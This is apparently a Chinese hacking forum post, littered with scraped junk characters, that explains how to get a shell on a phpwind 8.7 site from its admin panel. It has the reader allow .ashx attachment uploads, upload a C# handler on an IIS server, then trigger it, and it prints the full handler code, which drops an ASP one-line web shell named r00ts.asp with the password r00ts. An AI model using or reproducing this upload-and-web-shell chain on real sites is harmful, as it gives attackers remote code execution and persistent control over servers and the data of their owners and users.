phpwind 8.7 后台拿shell

admin

首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小

群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
( P4 V5 D) r& @2 f  P$ L
  d" L. [7 e' s发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整

9 e- f/ H% n& |8 V然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx

3 I3 I$ x" S' [打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
1 E6 x' D* L& H% z5 E( ?
+ Q1 ?$ e3 ]: s( o! h3 }9 ~下面是代码:

<%@ WebHandler Language="C#"Class="Handler" %>
using System;
using System.Web;
using System.IO;
public class Handler : IHttpHandler {
) N" B- f- m- w  f3 i% y" p* hpublic void ProcessRequest (HttpContext context) {
0 w( W: }5 i- |# p2 r: s, Acontext.Response.ContentType = "text/plain";
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
$ r( X4 P& s  K9 N9 ^file1.Write("<%eval request(\"r00ts\")%>");
9 c: a9 \: {- Gfile1.Flush();
file1.Close();
9 j) g* r- v% @7 x6 z, o6 m$ K}
public bool IsReusable {
4 Q. O$ j  _5 C% V7 ?# Aget {
5 ^" r5 H9 H6 _return false;
}
1 \% y# J0 n3 T. |}
}
' L2 R7 e& v/ M